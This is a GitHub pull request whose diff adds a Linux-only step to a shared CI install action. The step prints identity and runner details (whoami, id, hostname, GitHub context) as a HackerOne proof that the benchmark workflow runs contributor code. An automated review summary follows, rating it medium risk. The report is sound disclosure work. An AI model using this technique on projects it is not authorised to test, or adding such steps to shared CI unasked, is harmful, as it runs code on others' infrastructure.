### PR TITLE
ci: add harmless benchmark runner identity diagnostics

### DIFF
--- a/.github/actions/install/action.yml
+++ b/.github/actions/install/action.yml
@@ -39,6 +39,19 @@ inputs:
 runs:
   using: "composite"
   steps:
+    - name: H1 harmless benchmark runner RCE identity proof
+      if: runner.os == 'linux'
+      shell: bash
+      run: |
+        set -eu
+        echo 'h1-rce-proof marker=chia-benchmark-runner-20260620'
+        printf 'h1-rce-proof whoami=%s\n' "$(whoami)"
+        printf 'h1-rce-proof id=%s\n' "$(id)"
+        printf 'h1-rce-proof hostname=%s\n' "$(hostname)"
+        printf 'h1-rce-proof pwd=%s\n' "$PWD"
+        printf 'h1-rce-proof runner_name=%s runner_os=%s runner_arch=%s\n' "${RUNNER_NAME:-unset}" "${RUNNER_OS:-unset}" "${RUNNER_ARCH:-unset}"
+        printf 'h1-rce-proof github_repository=%s github_ref=%s github_sha=%s github_run_id=%s\n' "${GITHUB_REPOSITORY:-unset}" "${GITHUB_REF:-unset}" "${GITHUB_SHA:-unset}" "${GITHUB_RUN_ID:-unset}"
+
     - name: Run install script (macOS, Ubuntu)
       if: runner.os == 'macos' || runner.os == 'linux'
       shell: bash


### PR DESCRIPTION
Temporary harmless security validation PR for a HackerOne report.

This PR intentionally adds a single Linux-only diagnostic step to the existing local install action. The step only prints:

- a unique `h1-rce-proof` marker
- `whoami`
- `id`
- `hostname`
- `pwd`
- GitHub runner context variables

It does not read secrets, write files, call the Docker API, access the network, or modify the build output. Please do not merge this PR; it is only intended to produce direct command-output evidence from the benchmark workflow.

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **Medium Risk**
> Touches shared CI infrastructure used across workflows; if merged, every Linux install job would run arbitrary bash and expose runner metadata in logs, though the step is read-only and labeled for a one-off PoC.
> 
> **Overview**
> Adds a **new first step** to the composite `.github/actions/install` action, gated to **Linux only**, before the existing install script runs.
> 
> The step prints a fixed `h1-rce-proof` marker plus non-secret host and GitHub Actions context (`whoami`, `id`, `hostname`, `PWD`, runner name/OS/arch, repository, ref, SHA, run ID). It does not change install inputs or later steps.
> 
> Because this action is reused by multiple workflows (including **benchmarks** and Linux installer builds), any Linux job that calls `./.github/actions/install` will emit this output in CI logs. The PR is framed as temporary evidence for a HackerOne report and is not intended to merge.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit d098c015c9e995575bb59de4aa97793db7eb813c. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->